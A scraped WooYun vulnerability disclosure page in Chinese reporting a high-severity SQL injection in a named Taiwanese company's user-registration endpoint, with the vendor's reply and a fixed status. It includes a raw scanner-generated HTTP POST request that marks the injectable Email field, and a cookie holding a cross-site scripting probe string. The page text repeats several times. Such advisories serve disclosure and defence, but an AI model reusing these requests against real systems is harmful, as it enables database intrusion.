时间轴某站sql注入一枚 | wooyun-2015-0149409| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0149409

漏洞标题：时间轴某站sql注入一枚

漏洞作者：小龙宝

提交时间：2015-10-26 09:51

修复时间：2015-11-23 10:13

公开时间：2015-11-23 10:13

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-26：细节已通知厂商并且等待厂商处理中
2015-10-26：厂商已经确认，细节仅向厂商公开
2015-11-05：细节向核心白帽子及相关领域专家公开
2015-11-15：细节向普通白帽子公开
2015-11-23：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

详细说明：

post型注入，Email值置为 1*
<codePOST /User/insertv2 HTTP/1.1
Content-Length: 1314
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_XDFRHJFPIH
Cookie: PHPSESSID=tucaefbr7d1ons1e4dpo8uuaa3; _Timer=2; __utmt=1; __utma=112679063.147806675.1445761226.1445761226.1445761226.1; __utmb=112679063.1.10.1445761226; __utmc=112679063; __utmz=112679063.1445761226.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __atuvc=1%7C43; __atuvs=562c90cd86154c59000
Host: buzz.hiiir.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="accept"
on
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="Account"
4111111111111111
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="day"
1
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="Email"
1*
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="month"
1
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="Nickname"
jhpqnhss
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="Occupation"
1
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="Openid"
1
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="PassWord"
g00dPa$$w0rD
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="Sex"
1
-------AcunetixBoundary_XDFRHJFPIH
Content-Disposition: form-data; name="year"
1940
-------AcunetixBoundary_XDFRHJFPIH--
</code>
注入点

类型

8个库

漏洞证明：

修复方案：

版权声明：转载请注明来源小龙宝@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-10-26 18:16

厂商回复：

此網站屬於公司早期服務，後續已經沒有再持續維護，但是我們仍然感謝您的回報，我們會儘快處理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0149409

漏洞标题：时间轴某站sql注入一枚

相关厂商：時間軸科技股份有限公司

漏洞作者：小龙宝

提交时间：2015-10-26 09:51

修复时间：2015-11-23 10:13

公开时间：2015-11-23 10:13

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小龙宝@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0149409

漏洞标题：时间轴某站sql注入一枚

相关厂商：時間軸科技股份有限公司

漏洞作者： 小龙宝

提交时间：2015-10-26 09:51

修复时间：2015-11-23 10:13

公开时间：2015-11-23 10:13

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0149409"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小龙宝@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小龙宝

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小龙宝@乌云